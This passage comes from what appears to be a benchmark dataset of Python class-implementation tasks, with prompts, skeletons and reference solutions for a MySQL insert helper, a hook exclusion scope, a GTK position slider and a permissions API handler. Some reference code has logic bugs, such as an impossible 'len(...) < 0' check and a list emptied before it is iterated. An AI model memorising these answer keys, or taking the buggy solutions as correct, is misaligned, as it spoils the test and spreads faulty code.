columns.index(pk_col)\nto_insert, to_update = ([], [])\nfor index, row in enumerate(unique):\n if row[pk_index] not in keys:\n to_insert.append(unique[index])\n elif row[pk_index] in keys:\n to_update.append(unique[index])\nif len(to_insert) > 0:\n self.insert_many(table, columns, to_insert)\nif len(to_update) > 0:\n self.update_many(table, columns, to_update, pk_col, 0)\nif len(to_insert) < 1 and len(to_update) < 0:\n self._printer('No rows added to', table)", "cols, vals = get_col_val_str(columns)\nstatement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\nif execute:\n self._cursor.execute(statement, values)\n self._commit()\n self._printer('\\tMySQL row successfully inserted into {0}'.format(table))\nelse:\n return statement", "if not isinstance(values[0], (list, set, tuple)):\n values = []\n for v in values:\n if v is not None and len(v) > 0:\n values.append([v])\n else:\n values.append([None])\ncols, vals = get_col_val_str(columns)\nstatement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\nif execute and len(values) > limit:\n while len(values) > 0:\n vals = [values.pop(0) for i in range(0, min(limit, len(values)))]\n self._cursor.executemany(statement, vals)\n self._commit()\nelif execute:\n self._cursor.executemany(statement, values)\n self._commit()\n self._printer('\\tMySQL rows (' + str(len(values)) + ') successfully INSERTED')\nelse:\n return statement"], "bodies_text": "<|body_start_0|>\n existing_rows = self.select(table, columns)\n unique = diff(existing_rows, values, y_only=True)\n keys = self.get_primary_key_vals(table)\n pk_col = self.get_primary_key(table)\n pk_index = columns.index(pk_col)\n to_insert, to_update = ([], [])\n for index, row in enumerate(unique):\n if row[pk_index] not in keys:\n to_insert.append(unique[index])\n elif row[pk_index] in keys:\n to_update.append(unique[index])\n if len(to_insert) > 0:\n self.insert_many(table, columns, to_insert)\n if len(to_update) > 0:\n self.update_many(table, columns, to_update, pk_col, 0)\n if len(to_insert) < 1 and len(to_update) < 0:\n self._printer('No rows added to', table)\n<|end_body_0|>\n\n<|body_start_1|>\n cols, vals = get_col_val_str(columns)\n statement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\n if execute:\n self._cursor.execute(statement, values)\n self._commit()\n self._printer('\\tMySQL row successfully inserted into {0}'.format(table))\n else:\n return statement\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(values[0], (list, set, tuple)):\n values = []\n for v in values:\n if v is not None and len(v) > 0:\n values.append([v])\n else:\n values.append([None])\n cols, vals = get_col_val_str(columns)\n statement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\n if execute and len(values) > limit:\n while len(values) > 0:\n vals = [values.pop(0) for i in range(0, min(limit, len(values)))]\n self._cursor.executemany(statement, vals)\n self._commit()\n elif execute:\n self._cursor.executemany(statement, values)\n self._commit()\n self._printer('\\tMySQL rows (' + str(len(values)) + ') successfully INSERTED')\n else:\n return statement\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Insert", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Insert:\n\n def insert_uniques(self, table, columns, values):\n \"\"\"Insert multiple rows into a table that do not already exist. If the rows primary key already exists, the rows values will be updated. If the rows primary key does not exists, a new row will be inserted\"\"\"\n <|body_0|>\n\n def insert(self, table, columns, values, execute=True):\n \"\"\"Insert a single row into a table.\"\"\"\n <|body_1|>\n\n def insert_many(self, table, columns, values, limit=MAX_ROWS_PER_QUERY, execute=True):\n \"\"\"Insert multiple rows into a table. If only one row is found, self.insert method will be used.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n existing_rows = self.select(table, columns)\n unique = diff(existing_rows, values, y_only=True)\n keys = self.get_primary_key_vals(table)\n pk_col = self.get_primary_key(table)\n pk_index = columns.index(pk_col)\n to_insert, to_update = ([], [])\n for index, row in enumerate(unique):\n if row[pk_index] not in keys:\n to_insert.append(unique[index])\n elif row[pk_index] in keys:\n to_update.append(unique[index])\n if len(to_insert) > 0:\n self.insert_many(table, columns, to_insert)\n if len(to_update) > 0:\n self.update_many(table, columns, to_update, pk_col, 0)\n if len(to_insert) < 1 and len(to_update) < 0:\n self._printer('No rows added to', table)\n<|end_body_0|>\n\n<|body_start_1|>\n cols, vals = get_col_val_str(columns)\n statement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\n if execute:\n self._cursor.execute(statement, values)\n self._commit()\n self._printer('\\tMySQL row successfully inserted into {0}'.format(table))\n else:\n return statement\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(values[0], (list, set, tuple)):\n values = []\n for v in values:\n if v is not None and len(v) > 0:\n values.append([v])\n else:\n values.append([None])\n cols, vals = get_col_val_str(columns)\n statement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\n if execute and len(values) > limit:\n while len(values) > 0:\n vals = [values.pop(0) for i in range(0, min(limit, len(values)))]\n self._cursor.executemany(statement, vals)\n self._commit()\n elif execute:\n self._cursor.executemany(statement, values)\n self._commit()\n self._printer('\\tMySQL rows (' + str(len(values)) + ') successfully INSERTED')\n else:\n return statement\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000178", "length_bytes": 3676, "license_type": "permissive", "methods": [{"docstring": "Insert multiple rows into a table that do not already exist. If the rows primary key already exists, the rows values will be updated. If the rows primary key does not exists, a new row will be inserted", "name": "insert_uniques", "signature": "def insert_uniques(self, table, columns, values)"}, {"docstring": "Insert a single row into a table.", "name": "insert", "signature": "def insert(self, table, columns, values, execute=True)"}, {"docstring": "Insert multiple rows into a table. If only one row is found, self.insert method will be used.", "name": "insert_many", "signature": "def insert_many(self, table, columns, values, limit=MAX_ROWS_PER_QUERY, execute=True)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_test_000345", "prompt": "Implement the Python class `Insert` described below.\n\nClass description:\nImplement the Insert class.\n\nMethod signatures and docstrings:\n- def insert_uniques(self, table, columns, values): Insert multiple rows into a table that do not already exist. If the rows primary key already exists, the rows values will be updated. If the rows primary key does not exists, a new row will be inserted\n- def insert(self, table, columns, values, execute=True): Insert a single row into a table.\n- def insert_many(self, table, columns, values, limit=MAX_ROWS_PER_QUERY, execute=True): Insert multiple rows into a table. If only one row is found, self.insert method will be used.", "prompted_full_text": "Implement the Python class `Insert` described below.\n\nClass description:\nImplement the Insert class.\n\nMethod signatures and docstrings:\n- def insert_uniques(self, table, columns, values): Insert multiple rows into a table that do not already exist. If the rows primary key already exists, the rows values will be updated. If the rows primary key does not exists, a new row will be inserted\n- def insert(self, table, columns, values, execute=True): Insert a single row into a table.\n- def insert_many(self, table, columns, values, limit=MAX_ROWS_PER_QUERY, execute=True): Insert multiple rows into a table. If only one row is found, self.insert method will be used.\n\n<|skeleton|>\nclass Insert:\n\n def insert_uniques(self, table, columns, values):\n \"\"\"Insert multiple rows into a table that do not already exist. If the rows primary key already exists, the rows values will be updated. If the rows primary key does not exists, a new row will be inserted\"\"\"\n <|body_0|>\n\n def insert(self, table, columns, values, execute=True):\n \"\"\"Insert a single row into a table.\"\"\"\n <|body_1|>\n\n def insert_many(self, table, columns, values, limit=MAX_ROWS_PER_QUERY, execute=True):\n \"\"\"Insert multiple rows into a table. If only one row is found, self.insert method will be used.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n existing_rows = self.select(table, columns)\n unique = diff(existing_rows, values, y_only=True)\n keys = self.get_primary_key_vals(table)\n pk_col = self.get_primary_key(table)\n pk_index = columns.index(pk_col)\n to_insert, to_update = ([], [])\n for index, row in enumerate(unique):\n if row[pk_index] not in keys:\n to_insert.append(unique[index])\n elif row[pk_index] in keys:\n to_update.append(unique[index])\n if len(to_insert) > 0:\n self.insert_many(table, columns, to_insert)\n if len(to_update) > 0:\n self.update_many(table, columns, to_update, pk_col, 0)\n if len(to_insert) < 1 and len(to_update) < 0:\n self._printer('No rows added to', table)\n<|end_body_0|>\n\n<|body_start_1|>\n cols, vals = get_col_val_str(columns)\n statement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\n if execute:\n self._cursor.execute(statement, values)\n self._commit()\n self._printer('\\tMySQL row successfully inserted into {0}'.format(table))\n else:\n return statement\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(values[0], (list, set, tuple)):\n values = []\n for v in values:\n if v is not None and len(v) > 0:\n values.append([v])\n else:\n values.append([None])\n cols, vals = get_col_val_str(columns)\n statement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\n if execute and len(values) > limit:\n while len(values) > 0:\n vals = [values.pop(0) for i in range(0, min(limit, len(values)))]\n self._cursor.executemany(statement, vals)\n self._commit()\n elif execute:\n self._cursor.executemany(statement, values)\n self._commit()\n self._printer('\\tMySQL rows (' + str(len(values)) + ') successfully INSERTED')\n else:\n return statement\n<|end_body_2|>\n", "revision_id": "6964f718f4b72eb30f2259adfcfaf3090526c53d", "skeleton": "<|skeleton|>\nclass Insert:\n\n def insert_uniques(self, table, columns, values):\n \"\"\"Insert multiple rows into a table that do not already exist. If the rows primary key already exists, the rows values will be updated. If the rows primary key does not exists, a new row will be inserted\"\"\"\n <|body_0|>\n\n def insert(self, table, columns, values, execute=True):\n \"\"\"Insert a single row into a table.\"\"\"\n <|body_1|>\n\n def insert_many(self, table, columns, values, limit=MAX_ROWS_PER_QUERY, execute=True):\n \"\"\"Insert multiple rows into a table. If only one row is found, self.insert method will be used.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Insert:\n def insert_uniques(self, table, columns, values):\n \"\"\"Insert multiple rows into a table that do not already exist. If the rows primary key already exists, the rows values will be updated. If the rows primary key does not exists, a new row will be inserted\"\"\"\n existing_rows = self.select(table, columns)\n unique = diff(existing_rows, values, y_only=True)\n keys = self.get_primary_key_vals(table)\n pk_col = self.get_primary_key(table)\n pk_index = columns.index(pk_col)\n to_insert, to_update = ([], [])\n for index, row in enumerate(unique):\n if row[pk_index] not in keys:\n to_insert.append(unique[index])\n elif row[pk_index] in keys:\n to_update.append(unique[index])\n if len(to_insert) > 0:\n self.insert_many(table, columns, to_insert)\n if len(to_update) > 0:\n self.update_many(table, columns, to_update, pk_col, 0)\n if len(to_insert) < 1 and len(to_update) < 0:\n self._printer('No rows added to', table)\n\n def insert(self, table, columns, values, execute=True):\n \"\"\"Insert a single row into a table.\"\"\"\n cols, vals = get_col_val_str(columns)\n statement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\n if execute:\n self._cursor.execute(statement, values)\n self._commit()\n self._printer('\\tMySQL row successfully inserted into {0}'.format(table))\n else:\n return statement\n\n def insert_many(self, table, columns, values, limit=MAX_ROWS_PER_QUERY, execute=True):\n \"\"\"Insert multiple rows into a table. If only one row is found, self.insert method will be used.\"\"\"\n if not isinstance(values[0], (list, set, tuple)):\n values = []\n for v in values:\n if v is not None and len(v) > 0:\n values.append([v])\n else:\n values.append([None])\n cols, vals = get_col_val_str(columns)\n statement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\n if execute and len(values) > limit:\n while len(values) > 0:\n vals = [values.pop(0) for i in range(0, min(limit, len(values)))]\n self._cursor.executemany(statement, vals)\n self._commit()\n elif execute:\n self._cursor.executemany(statement, values)\n self._commit()\n self._printer('\\tMySQL rows (' + str(len(values)) + ') successfully INSERTED')\n else:\n return statement\n", "source": "the_stack_v2_python_sparse", "source_path": "mysql/toolkit/components/manipulate/insert.py", "source_repo": "sfneal/mysql-toolkit", "split": "test", "star_events_count": 6} {"blob_id": "639c879674e4028b92c59d215b35f7bcf8022c21", "bodies": ["self._scope = []\nfor path in scope:\n if path.startswith('^'):\n self._scope.append(re.compile(path))\n else:\n self._scope.append(path)", "for exclusion_path in self._scope:\n if hasattr(exclusion_path, 'match'):\n if exclusion_path.match(proj_dir):\n return True\n elif fnmatch.fnmatch(proj_dir, exclusion_path):\n return True\nreturn False"], "bodies_text": "<|body_start_0|>\n self._scope = []\n for path in scope:\n if path.startswith('^'):\n self._scope.append(re.compile(path))\n else:\n self._scope.append(path)\n<|end_body_0|>\n\n<|body_start_1|>\n for exclusion_path in self._scope:\n if hasattr(exclusion_path, 'match'):\n if exclusion_path.match(proj_dir):\n return True\n elif fnmatch.fnmatch(proj_dir, exclusion_path):\n return True\n return False\n<|end_body_1|>\n", "class_docstring": "Exclusion scope for a hook. An exclusion scope can be used to determine if a hook has been disabled for a specific project.", "class_name": "ExclusionScope", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ExclusionScope:\n \"\"\"Exclusion scope for a hook. An exclusion scope can be used to determine if a hook has been disabled for a specific project.\"\"\"\n\n def __init__(self, scope):\n \"\"\"Initialize. Args: scope: A list of shell-style wildcards (fnmatch) or regular expression. Regular expressions must start with the ^ character.\"\"\"\n <|body_0|>\n\n def __contains__(self, proj_dir):\n \"\"\"Checks if |proj_dir| matches the excluded paths. Args: proj_dir: The relative path of the project.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._scope = []\n for path in scope:\n if path.startswith('^'):\n self._scope.append(re.compile(path))\n else:\n self._scope.append(path)\n<|end_body_0|>\n\n<|body_start_1|>\n for exclusion_path in self._scope:\n if hasattr(exclusion_path, 'match'):\n if exclusion_path.match(proj_dir):\n return True\n elif fnmatch.fnmatch(proj_dir, exclusion_path):\n return True\n return False\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000179", "length_bytes": 37276, "license_type": "no_license", "methods": [{"docstring": "Initialize. Args: scope: A list of shell-style wildcards (fnmatch) or regular expression. Regular expressions must start with the ^ character.", "name": "__init__", "signature": "def __init__(self, scope)"}, {"docstring": "Checks if |proj_dir| matches the excluded paths. Args: proj_dir: The relative path of the project.", "name": "__contains__", "signature": "def __contains__(self, proj_dir)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003060", "prompt": "Implement the Python class `ExclusionScope` described below.\n\nClass description:\nExclusion scope for a hook. An exclusion scope can be used to determine if a hook has been disabled for a specific project.\n\nMethod signatures and docstrings:\n- def __init__(self, scope): Initialize. Args: scope: A list of shell-style wildcards (fnmatch) or regular expression. Regular expressions must start with the ^ character.\n- def __contains__(self, proj_dir): Checks if |proj_dir| matches the excluded paths. Args: proj_dir: The relative path of the project.", "prompted_full_text": "Implement the Python class `ExclusionScope` described below.\n\nClass description:\nExclusion scope for a hook. An exclusion scope can be used to determine if a hook has been disabled for a specific project.\n\nMethod signatures and docstrings:\n- def __init__(self, scope): Initialize. Args: scope: A list of shell-style wildcards (fnmatch) or regular expression. Regular expressions must start with the ^ character.\n- def __contains__(self, proj_dir): Checks if |proj_dir| matches the excluded paths. Args: proj_dir: The relative path of the project.\n\n<|skeleton|>\nclass ExclusionScope:\n \"\"\"Exclusion scope for a hook. An exclusion scope can be used to determine if a hook has been disabled for a specific project.\"\"\"\n\n def __init__(self, scope):\n \"\"\"Initialize. Args: scope: A list of shell-style wildcards (fnmatch) or regular expression. Regular expressions must start with the ^ character.\"\"\"\n <|body_0|>\n\n def __contains__(self, proj_dir):\n \"\"\"Checks if |proj_dir| matches the excluded paths. Args: proj_dir: The relative path of the project.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._scope = []\n for path in scope:\n if path.startswith('^'):\n self._scope.append(re.compile(path))\n else:\n self._scope.append(path)\n<|end_body_0|>\n\n<|body_start_1|>\n for exclusion_path in self._scope:\n if hasattr(exclusion_path, 'match'):\n if exclusion_path.match(proj_dir):\n return True\n elif fnmatch.fnmatch(proj_dir, exclusion_path):\n return True\n return False\n<|end_body_1|>\n", "revision_id": "78a61ca023cbf1a0cecfef8b97df2b274ac3a988", "skeleton": "<|skeleton|>\nclass ExclusionScope:\n \"\"\"Exclusion scope for a hook. An exclusion scope can be used to determine if a hook has been disabled for a specific project.\"\"\"\n\n def __init__(self, scope):\n \"\"\"Initialize. Args: scope: A list of shell-style wildcards (fnmatch) or regular expression. Regular expressions must start with the ^ character.\"\"\"\n <|body_0|>\n\n def __contains__(self, proj_dir):\n \"\"\"Checks if |proj_dir| matches the excluded paths. Args: proj_dir: The relative path of the project.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ExclusionScope:\n \"\"\"Exclusion scope for a hook. An exclusion scope can be used to determine if a hook has been disabled for a specific project.\"\"\"\n\n def __init__(self, scope):\n \"\"\"Initialize. Args: scope: A list of shell-style wildcards (fnmatch) or regular expression. Regular expressions must start with the ^ character.\"\"\"\n self._scope = []\n for path in scope:\n if path.startswith('^'):\n self._scope.append(re.compile(path))\n else:\n self._scope.append(path)\n\n def __contains__(self, proj_dir):\n \"\"\"Checks if |proj_dir| matches the excluded paths. Args: proj_dir: The relative path of the project.\"\"\"\n for exclusion_path in self._scope:\n if hasattr(exclusion_path, 'match'):\n if exclusion_path.match(proj_dir):\n return True\n elif fnmatch.fnmatch(proj_dir, exclusion_path):\n return True\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "tools/repohooks/rh/hooks.py", "source_repo": "ZYHGOD-1/Aosp11", "split": "test", "star_events_count": 0} {"blob_id": "ea17631ac4dd76bd8f9486f65c6a1478b87d973c", "bodies": ["self._pubsub = pubsub_bus\nself._player = player_\nbuilder = Gtk.Builder.new_from_string(resources.read_text('pepper_music_player.ui', 'player_status_position_slider.glade'), length=-1)\nself.widget = builder.get_object('container')\nalignment.set_direction_recursive(self.widget, Gtk.TextDirection.LTR)\nself._position: Gtk.Label = builder.get_object('position')\nself._duration: Gtk.Label = builder.get_object('duration')\nself.slider: Gtk.Scale = builder.get_object('slider')\nself._pubsub.subscribe(player.PlayStatus, self._handle_play_status, want_last_message=True)\nbuilder.connect_signals(self)", "alignment.fill_aligned_numerical_label(self._position, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.position))\nalignment.fill_aligned_numerical_label(self._duration, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.duration))\nself.slider.set_range(0.0, status.duration.total_seconds())\nself.slider.set_value(status.position.total_seconds())", "del slider, scroll\nlower = self.slider.get_adjustment().get_lower()\nupper = self.slider.get_adjustment().get_upper()\nself._player.seek(datetime.timedelta(seconds=min(max(value, lower), upper)))\nreturn False"], "bodies_text": "<|body_start_0|>\n self._pubsub = pubsub_bus\n self._player = player_\n builder = Gtk.Builder.new_from_string(resources.read_text('pepper_music_player.ui', 'player_status_position_slider.glade'), length=-1)\n self.widget = builder.get_object('container')\n alignment.set_direction_recursive(self.widget, Gtk.TextDirection.LTR)\n self._position: Gtk.Label = builder.get_object('position')\n self._duration: Gtk.Label = builder.get_object('duration')\n self.slider: Gtk.Scale = builder.get_object('slider')\n self._pubsub.subscribe(player.PlayStatus, self._handle_play_status, want_last_message=True)\n builder.connect_signals(self)\n<|end_body_0|>\n\n<|body_start_1|>\n alignment.fill_aligned_numerical_label(self._position, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.position))\n alignment.fill_aligned_numerical_label(self._duration, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.duration))\n self.slider.set_range(0.0, status.duration.total_seconds())\n self.slider.set_value(status.position.total_seconds())\n<|end_body_1|>\n\n<|body_start_2|>\n del slider, scroll\n lower = self.slider.get_adjustment().get_lower()\n upper = self.slider.get_adjustment().get_upper()\n self._player.seek(datetime.timedelta(seconds=min(max(value, lower), upper)))\n return False\n<|end_body_2|>\n", "class_docstring": "Position slider, including labels for the current position and duration. Attributes: widget: Widget containing the slider and labels. slider: Slider for seeking. This is public for use in tests only.", "class_name": "PositionSlider", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PositionSlider:\n \"\"\"Position slider, including labels for the current position and duration. Attributes: widget: Widget containing the slider and labels. slider: Slider for seeking. This is public for use in tests only.\"\"\"\n\n def __init__(self, *, pubsub_bus: pubsub.PubSub, player_: player.Player) -> None:\n \"\"\"Initializer. Args: pubsub_bus: PubSub message bus. player_: Player.\"\"\"\n <|body_0|>\n\n def _handle_play_status(self, status: player.PlayStatus) -> None:\n \"\"\"Handler for PlayStatus updates.\"\"\"\n <|body_1|>\n\n def on_slider_change_value(self, slider: Gtk.Scale, scroll: Gtk.ScrollType, value: float) -> bool:\n \"\"\"Handler for the slider's change-value signal.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._pubsub = pubsub_bus\n self._player = player_\n builder = Gtk.Builder.new_from_string(resources.read_text('pepper_music_player.ui', 'player_status_position_slider.glade'), length=-1)\n self.widget = builder.get_object('container')\n alignment.set_direction_recursive(self.widget, Gtk.TextDirection.LTR)\n self._position: Gtk.Label = builder.get_object('position')\n self._duration: Gtk.Label = builder.get_object('duration')\n self.slider: Gtk.Scale = builder.get_object('slider')\n self._pubsub.subscribe(player.PlayStatus, self._handle_play_status, want_last_message=True)\n builder.connect_signals(self)\n<|end_body_0|>\n\n<|body_start_1|>\n alignment.fill_aligned_numerical_label(self._position, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.position))\n alignment.fill_aligned_numerical_label(self._duration, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.duration))\n self.slider.set_range(0.0, status.duration.total_seconds())\n self.slider.set_value(status.position.total_seconds())\n<|end_body_1|>\n\n<|body_start_2|>\n del slider, scroll\n lower = self.slider.get_adjustment().get_lower()\n upper = self.slider.get_adjustment().get_upper()\n self._player.seek(datetime.timedelta(seconds=min(max(value, lower), upper)))\n return False\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000180", "length_bytes": 7252, "license_type": "permissive", "methods": [{"docstring": "Initializer. Args: pubsub_bus: PubSub message bus. player_: Player.", "name": "__init__", "signature": "def __init__(self, *, pubsub_bus: pubsub.PubSub, player_: player.Player) -> None"}, {"docstring": "Handler for PlayStatus updates.", "name": "_handle_play_status", "signature": "def _handle_play_status(self, status: player.PlayStatus) -> None"}, {"docstring": "Handler for the slider's change-value signal.", "name": "on_slider_change_value", "signature": "def on_slider_change_value(self, slider: Gtk.Scale, scroll: Gtk.ScrollType, value: float) -> bool"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005554", "prompt": "Implement the Python class `PositionSlider` described below.\n\nClass description:\nPosition slider, including labels for the current position and duration. Attributes: widget: Widget containing the slider and labels. slider: Slider for seeking. This is public for use in tests only.\n\nMethod signatures and docstrings:\n- def __init__(self, *, pubsub_bus: pubsub.PubSub, player_: player.Player) -> None: Initializer. Args: pubsub_bus: PubSub message bus. player_: Player.\n- def _handle_play_status(self, status: player.PlayStatus) -> None: Handler for PlayStatus updates.\n- def on_slider_change_value(self, slider: Gtk.Scale, scroll: Gtk.ScrollType, value: float) -> bool: Handler for the slider's change-value signal.", "prompted_full_text": "Implement the Python class `PositionSlider` described below.\n\nClass description:\nPosition slider, including labels for the current position and duration. Attributes: widget: Widget containing the slider and labels. slider: Slider for seeking. This is public for use in tests only.\n\nMethod signatures and docstrings:\n- def __init__(self, *, pubsub_bus: pubsub.PubSub, player_: player.Player) -> None: Initializer. Args: pubsub_bus: PubSub message bus. player_: Player.\n- def _handle_play_status(self, status: player.PlayStatus) -> None: Handler for PlayStatus updates.\n- def on_slider_change_value(self, slider: Gtk.Scale, scroll: Gtk.ScrollType, value: float) -> bool: Handler for the slider's change-value signal.\n\n<|skeleton|>\nclass PositionSlider:\n \"\"\"Position slider, including labels for the current position and duration. Attributes: widget: Widget containing the slider and labels. slider: Slider for seeking. This is public for use in tests only.\"\"\"\n\n def __init__(self, *, pubsub_bus: pubsub.PubSub, player_: player.Player) -> None:\n \"\"\"Initializer. Args: pubsub_bus: PubSub message bus. player_: Player.\"\"\"\n <|body_0|>\n\n def _handle_play_status(self, status: player.PlayStatus) -> None:\n \"\"\"Handler for PlayStatus updates.\"\"\"\n <|body_1|>\n\n def on_slider_change_value(self, slider: Gtk.Scale, scroll: Gtk.ScrollType, value: float) -> bool:\n \"\"\"Handler for the slider's change-value signal.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._pubsub = pubsub_bus\n self._player = player_\n builder = Gtk.Builder.new_from_string(resources.read_text('pepper_music_player.ui', 'player_status_position_slider.glade'), length=-1)\n self.widget = builder.get_object('container')\n alignment.set_direction_recursive(self.widget, Gtk.TextDirection.LTR)\n self._position: Gtk.Label = builder.get_object('position')\n self._duration: Gtk.Label = builder.get_object('duration')\n self.slider: Gtk.Scale = builder.get_object('slider')\n self._pubsub.subscribe(player.PlayStatus, self._handle_play_status, want_last_message=True)\n builder.connect_signals(self)\n<|end_body_0|>\n\n<|body_start_1|>\n alignment.fill_aligned_numerical_label(self._position, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.position))\n alignment.fill_aligned_numerical_label(self._duration, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.duration))\n self.slider.set_range(0.0, status.duration.total_seconds())\n self.slider.set_value(status.position.total_seconds())\n<|end_body_1|>\n\n<|body_start_2|>\n del slider, scroll\n lower = self.slider.get_adjustment().get_lower()\n upper = self.slider.get_adjustment().get_upper()\n self._player.seek(datetime.timedelta(seconds=min(max(value, lower), upper)))\n return False\n<|end_body_2|>\n", "revision_id": "2a45aef6deb6247c42d63b5f7475ec5517ea9321", "skeleton": "<|skeleton|>\nclass PositionSlider:\n \"\"\"Position slider, including labels for the current position and duration. Attributes: widget: Widget containing the slider and labels. slider: Slider for seeking. This is public for use in tests only.\"\"\"\n\n def __init__(self, *, pubsub_bus: pubsub.PubSub, player_: player.Player) -> None:\n \"\"\"Initializer. Args: pubsub_bus: PubSub message bus. player_: Player.\"\"\"\n <|body_0|>\n\n def _handle_play_status(self, status: player.PlayStatus) -> None:\n \"\"\"Handler for PlayStatus updates.\"\"\"\n <|body_1|>\n\n def on_slider_change_value(self, slider: Gtk.Scale, scroll: Gtk.ScrollType, value: float) -> bool:\n \"\"\"Handler for the slider's change-value signal.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PositionSlider:\n \"\"\"Position slider, including labels for the current position and duration. Attributes: widget: Widget containing the slider and labels. slider: Slider for seeking. This is public for use in tests only.\"\"\"\n\n def __init__(self, *, pubsub_bus: pubsub.PubSub, player_: player.Player) -> None:\n \"\"\"Initializer. Args: pubsub_bus: PubSub message bus. player_: Player.\"\"\"\n self._pubsub = pubsub_bus\n self._player = player_\n builder = Gtk.Builder.new_from_string(resources.read_text('pepper_music_player.ui', 'player_status_position_slider.glade'), length=-1)\n self.widget = builder.get_object('container')\n alignment.set_direction_recursive(self.widget, Gtk.TextDirection.LTR)\n self._position: Gtk.Label = builder.get_object('position')\n self._duration: Gtk.Label = builder.get_object('duration')\n self.slider: Gtk.Scale = builder.get_object('slider')\n self._pubsub.subscribe(player.PlayStatus, self._handle_play_status, want_last_message=True)\n builder.connect_signals(self)\n\n def _handle_play_status(self, status: player.PlayStatus) -> None:\n \"\"\"Handler for PlayStatus updates.\"\"\"\n alignment.fill_aligned_numerical_label(self._position, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.position))\n alignment.fill_aligned_numerical_label(self._duration, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.duration))\n self.slider.set_range(0.0, status.duration.total_seconds())\n self.slider.set_value(status.position.total_seconds())\n\n def on_slider_change_value(self, slider: Gtk.Scale, scroll: Gtk.ScrollType, value: float) -> bool:\n \"\"\"Handler for the slider's change-value signal.\"\"\"\n del slider, scroll\n lower = self.slider.get_adjustment().get_lower()\n upper = self.slider.get_adjustment().get_upper()\n self._player.seek(datetime.timedelta(seconds=min(max(value, lower), upper)))\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "pepper_music_player/ui/player_status.py", "source_repo": "EmDBaum/pepper-music-player", "split": "test", "star_events_count": 0} {"blob_id": "4056743ea5fa42f82439e8c8c0ab8eb0d8410d83", "bodies": ["logger.debug('Get repo: %s/%s permissions for user %s', namespace_name, repository_name, username)\nperm = model.get_repo_permission_for_user(username, namespace_name, repository_name)\nreturn perm.to_dict()", "new_permission = request.get_json()\nlogger.debug('Setting permission to: %s for user %s', new_permission['role'], username)\ntry:\n perm = model.set_repo_permission_for_user(username, namespace_name, repository_name, new_permission['role'])\n resp = perm.to_dict()\nexcept SaveException as ex:\n raise request_error(exception=ex)\nlog_action('change_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name, 'role': new_permission['role']}, repo_name=repository_name)\nreturn (resp, 200)", "try:\n model.delete_repo_permission_for_user(username, namespace_name, repository_name)\nexcept DeleteException as ex:\n raise request_error(exception=ex)\nlog_action('delete_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name}, repo_name=repository_name)\nreturn ('', 204)"], "bodies_text": "<|body_start_0|>\n logger.debug('Get repo: %s/%s permissions for user %s', namespace_name, repository_name, username)\n perm = model.get_repo_permission_for_user(username, namespace_name, repository_name)\n return perm.to_dict()\n<|end_body_0|>\n\n<|body_start_1|>\n new_permission = request.get_json()\n logger.debug('Setting permission to: %s for user %s', new_permission['role'], username)\n try:\n perm = model.set_repo_permission_for_user(username, namespace_name, repository_name, new_permission['role'])\n resp = perm.to_dict()\n except SaveException as ex:\n raise request_error(exception=ex)\n log_action('change_repo_permission', namespace_name, {'username': username, 'repo': repository_name, 'namespace': namespace_name, 'role': 